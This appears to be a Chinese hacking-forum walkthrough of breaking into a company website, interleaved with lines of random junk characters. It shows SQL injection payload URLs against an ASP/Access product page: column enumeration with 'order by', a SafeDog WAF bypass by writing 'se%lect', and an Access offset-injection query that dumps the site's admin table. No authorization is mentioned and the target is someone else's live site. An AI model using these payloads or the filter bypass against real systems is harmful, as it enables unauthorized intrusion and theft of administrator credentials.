打开网站,一个企业站。
; A; o9 L6 K2 C M7 Z% q, @, f
$ t% b; I% r7 {* P9 |2 r4 R7 g$ o I" x: ?
顺手加个admin
* ~% C2 C5 M( K# o: A3 e* ?0 p
2 f9 _8 m' p7 N+ x( B( e* M! z4 U+ s
% q6 ?( a: C/ _+ f' a4 ~9 R# ]. g默认后台。1 N' ], ?) m4 ~3 K
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
; |/ f1 a, j7 J+ U( C. x( x9 k4 g" ~4 E
" p1 v! D5 @( w4 T+ C
2 r9 |/ K; S& \ n; m& d; U所以就不用御剑扫了,待会直接封IP。+ F+ B& J) D/ T: I. h0 m3 Q6 ?8 `
, @" U/ C" ?* K: Y7 @8 ]% N. V用order by语句判断是否存在注入。
9 y M A4 c' E, m3 L/ F4 y4 h; Rhttp://www.xxx.com /product_show.asp?id=997 order by 1% H q* R) B# P" M7 m3 p9 c
http://www.xxx.com /product_show.asp?id=997 order by 100
/ h4 ]; s- ]* ~1 I3 @, X现在存在注入,经测试后发现是9个字段。+ }4 _1 o" | _ O' J6 j7 ?
4 R' _5 J6 t, R5 c! a
接下来进行联合查询,猜是否存在admin表。' `5 V: l4 I" _- S
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。0 b) n8 y0 V/ F" z
; k" i! e; I% C& F; m' K
: o1 I2 Y( n+ N. S
/ S$ E8 w: K! F" x7 y: i# x p在select中间加个%,se%lect绕过安全狗。
$ ]5 J% e7 |6 A
: K0 z) D8 b' Z1 w1 X* w# [- N( V- A. j7 D! X: c+ c5 Y
发现存在admin表,然后开始手工猜常用的字段。- i$ f+ s5 `- A2 q; j
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
0 D: e% ?6 w$ \
! J5 A2 i' L4 o, R, R1 y+ z" A突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。; A! M0 s) t" C' P! z6 w
8 {. ]' D# g n/ n8 ]# C; `科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
7 i7 }1 l+ ]9 x* h8 e- E' g7 Dhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
F4 s1 V8 C* j Q6 s% K好了,敏感内容出显了。0 \6 K3 x& p. C& ^2 _0 x* j) ~
2 l/ W2 N2 h; M" n, b6 x* @0 {! v& P, G
7 [2 Y7 c. \0 k! R5 Y. |2 s" k6 c& _ |